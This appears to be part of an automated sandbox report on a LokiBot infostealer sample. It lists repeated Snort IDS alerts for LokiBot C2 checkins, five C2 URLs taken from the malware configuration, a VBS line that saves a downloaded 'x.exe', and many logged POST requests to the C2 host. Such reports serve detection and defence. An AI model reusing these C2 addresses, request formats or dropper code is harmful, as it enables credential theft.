Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49800 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49800 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49800 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49800 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49800 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49801 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49801 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49801 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49801 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49801 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49802 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49802 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49802 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49802 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49802 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49803 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49803 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49803 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49803 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49803 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49804 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49804 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49804 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49804 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49804 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49805 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49805 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49805 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49805 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49805 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49806 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49806 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49806 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49806 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49806 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49807 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49807 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49807 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49807 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49807 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49808 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49808 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49808 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49808 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49808 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49809 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49809 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49809 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49809 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49809 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49810 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49810 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49810 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49810 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49810 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49811 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49811 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49811 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49811 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49811 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49812 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49812 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49812 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49812 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49812 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49814 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49814 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49814 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49814 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49814 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49815 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49815 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49815 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49815 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49815 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49816 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49816 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49816 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49816 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49816 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49818 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49818 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49818 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49818 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49818 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49819 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49819 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49819 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49819 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49819 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49820 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49820 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49820 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49820 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49820 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49821 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49821 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49821 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49821 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49821 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49822 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49822 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49822 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49822 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49822 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49823 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49823 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49823 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49823 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49823 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49824 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49824 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49824 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49824 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49824 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49825 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49825 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49825 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49825 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49825 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49826 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49826 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49826 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49826 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49826 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49827 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49827 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49827 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49827 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49827 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49828 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49828 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49828 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49828 -> 172.67.148.126:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49828 -> 172.67.148.126:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.top/alien/fre.php
Source: Malware configuration extractor	URLs: https://altaskifer.sbs/PWS/fre.php

Potential malicious VBS script found (has network functionality)

Source:

Initial file: obj3.SaveToFile obj4.BuildPath(obj5, "x.exe"), 2

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 188Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 188Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
